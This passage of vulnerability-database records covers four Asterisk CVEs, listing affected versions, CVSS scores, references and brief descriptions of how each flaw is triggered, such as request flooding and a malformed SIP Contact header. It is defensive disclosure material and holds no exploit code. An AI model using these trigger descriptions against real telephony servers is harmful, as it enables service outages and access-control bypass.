              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6447B77F-3770-4703-9188-B7344ED98E94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "5C103924-1D61-4090-8ED5-4731371B2B2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "08F87B09-3867-4CAE-BAD7-2206CD6CAF97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "0D12B31E-C30C-442A-9BD8-504CF7EB1321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B43DA484-83DC-4489-9037-B85B845078E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "D8740005-0BCF-4B76-A600-25A9BF0F3C42",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA00E078-97B8-4C2D-BD07-DB2A25908303",
              "versionEndIncluding": "13.8.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BE71990-160B-413F-AB66-C29C7C1CC82F",
              "versionEndIncluding": "14.7.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D39329BD-4A6B-48DB-AFDB-DC58154CBDD8",
              "versionEndIncluding": "15.1.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en chan_skinny.c en Asterisk Open Source en versiones 13.18.2 y anteriores, 14.7.2 y anteriores y 15.1.2 y anteriores y en Certified Asterisk 13.13-cert7 y anteriores. Si el controlador de canal chan_skinny (tambi\u00e9n conocido como protocolo SCCP) se inunda a base de determinadas peticiones, puede provocar que el proceso de asterisk utilice cantidades excesivas de memoria virtual, finalmente provocando que asterisk deje de procesar cualquier tipo de peticiones."
    }
  ],
  "id": "CVE-2017-17090",
  "lastModified": "2024-11-21T03:17:27.827",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": true,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-12-02T00:29:00.247",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-013.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/102023"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1039948"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27452"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.debian.org/security/2017/dsa-4076"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.exploit-db.com/exploits/43992/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-013.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/102023"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1039948"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27452"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.debian.org/security/2017/dsa-4076"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/43992/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-459"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-06-17 14:55

Modified

2024-11-21 02:09

Severity ?

Summary

The Publish/Subscribe Framework in the PJSIP channel driver in Asterisk Open Source 12.x before 12.3.1, when sub_min_expiry is set to zero, allows remote attackers to cause a denial of service (assertion failure and crash) via an unsubscribe request when not subscribed to the device.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-005.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html
cve@mitre.org	http://www.securityfocus.com/archive/1/532414/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-005.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/532414/100/0/threaded

Impacted products

Vendor	Product	Version
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The Publish/Subscribe Framework in the PJSIP channel driver in Asterisk Open Source 12.x before 12.3.1, when sub_min_expiry is set to zero, allows remote attackers to cause a denial of service (assertion failure and crash) via an unsubscribe request when not subscribed to the device."
    },
    {
      "lang": "es",
      "value": "El Framework Publish/Subscribe en el controlador de canales PJSIP en Asterisk Open Source 12.x anterior a 12.3.1, cuando sub_min_expiry est\u00e9 configurado a cero, permite a atacantes remotos causar una denegaci\u00f3n de servicio (fallo de aserci\u00f3n y ca\u00edda) a trav\u00e9s de una solicitud UNSUBSCRIBE cuando no est\u00e1 suscrito al dispositivo."
    }
  ],
  "id": "CVE-2014-4045",
  "lastModified": "2024-11-21T02:09:24.130",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-06-17T14:55:07.830",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/532414/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/127087/Asterisk-Project-Security-Advisory-AST-2014-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/532414/100/0/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-189"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-07-06 19:55

Modified

2024-11-21 01:28

Severity ?

Summary

reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.3 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a SIP packet with a Contact header that lacks a < (less than) character.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-009.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html
cve@mitre.org	http://secunia.com/advisories/45048	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/45201
cve@mitre.org	http://secunia.com/advisories/45239
cve@mitre.org	http://www.debian.org/security/2011/dsa-2276
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-009.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45048	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45201
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45239
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2276

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.3 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a SIP packet with a Contact header that lacks a \u003c (less than) character."
    },
    {
      "lang": "es",
      "value": "reqresp_parser.c en el controlador de canal SIP en Asterisk Open Source v1.8.x anteriores a v1.8.4.3 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (desreferencia a puntero NULL y ca\u00edda del demonio) a trav\u00e9s de un paquete SIP con una cabecera Contact que carece de un car\u00e1cter \u003c (menos que)."
    }
  ],
  "evaluatorComment": "Per: http://cwe.mitre.org/data/definitions/476.html\r\n\u0027CWE-476: NULL Pointer Dereference\u0027",
  "id": "CVE-2011-2665",
  "lastModified": "2024-11-21T01:28:43.127",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-07-06T19:55:03.590",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-009.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/45048"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/45201"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/45239"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2011/dsa-2276"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-009.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/45048"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/45201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/45239"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2276"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

The res_pjsip_acl module in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 does not properly create and load ACLs defined in pjsip.conf at startup, which allows remote attackers to bypass intended PJSIP ACL rules.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-013.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-013.html	Vendor Advisory

Impacted products

	Vendor	Product	Version
	digium	asterisk	*
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F21F0B73-A30F-4673-B3A8-D9F456FFCEF2",
              "versionEndExcluding": "12.7.1",
              "versionStartIncluding": "12.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C83CD93-7CBA-4FF0-B29E-A509F4A3D5E2",
              "versionEndExcluding": "13.0.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The res_pjsip_acl module in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 does not properly create and load ACLs defined in pjsip.conf at startup, which allows remote attackers to bypass intended PJSIP ACL rules."
    },
    {
      "lang": "es",
      "value": "El m\u00f3dulo res_pjsip_acl en Asterisk Open Source 12.x en versiones anteriores a 12.7.1 y 13.x en versiones anteriores a 13.0.1 no crea y carga adecuadamente ACLs definidos en pjsip.conf en el arranque, lo que permite a atacantes remotos eludir las reglas previstas para PJSIP ACL."
    }
  ],
  "id": "CVE-2014-8413",
  "lastModified": "2024-11-21T02:19:02.120",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:05.310",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-013.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-013.html"
    }
  ],
